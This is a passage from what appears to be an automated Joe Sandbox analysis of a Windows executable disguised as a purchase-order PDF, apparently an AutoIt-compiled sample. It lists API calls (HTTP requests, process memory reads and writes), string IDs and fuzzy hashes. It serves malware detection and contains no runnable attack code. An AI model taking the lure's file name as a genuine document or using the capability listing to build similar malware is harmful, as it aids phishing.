  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
• CoInitialize.OLE32(00000000), ref: 0046CE18
• CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
• CoUninitialize.OLE32 ref: 0046CE50
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
• Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
• Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
• Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 176396367-557222456
• Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
• Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
• Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
• Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• VariantInit.OLEAUT32(00000000), ref: 0042D2E0
• VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
• VariantClear.OLEAUT32(00000000), ref: 0042D2FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                                                                                                                                                                                            • String ID: 4RH
                                                                                                                                                                                                                                                                                                            • API String ID: 2981388473-749298218
                                                                                                                                                                                                                                                                                                            • Opcode ID: b920f10f783b350eb70fbfbd5e93e4346c96a834e76a4c916b96fd977c33ade8
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b920f10f783b350eb70fbfbd5e93e4346c96a834e76a4c916b96fd977c33ade8
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                            • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: LPT$HH
                                                                                                                                                                                                                                                                                                            • API String ID: 3035604524-2728063697
                                                                                                                                                                                                                                                                                                            • Opcode ID: c69e8bcaaf34f6b2839d1c10923ed9f72eeefb1e6e810cf1325bff5f105684a2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c69e8bcaaf34f6b2839d1c10923ed9f72eeefb1e6e810cf1325bff5f105684a2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                                            • API String ID: 4055202900-2766056989
                                                                                                                                                                                                                                                                                                            • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                                                                                                                                                            • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CrackInternet_memset_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: |
                                                                                                                                                                                                                                                                                                            • API String ID: 915713708-2343686810
                                                                                                                                                                                                                                                                                                            • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                                                                                                                                                            • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3705125965-3916222277
                                                                                                                                                                                                                                                                                                            • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                                                                                                                                                            • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                                                                                                                                                            • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: 1dedf52a0f02eaacb12c2aa0276960dc02bae986cca214e7a202bdcf23f35f06
• Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
• Opcode Fuzzy Hash: 1dedf52a0f02eaacb12c2aa0276960dc02bae986cca214e7a202bdcf23f35f06
• Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
APIs
• DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: DestroyWindow
• String ID: msctls_updown32
• API String ID: 3375834691-2298589950
• Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
• Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
• Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
• Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
• SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
• MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
• Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
• Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
• Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D243
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
Strings
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: HH
• API String ID: 2507767853-2761332787
• Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
• Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
• Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
• Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D44A
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
Strings
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
• Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
• Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
• Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
APIs
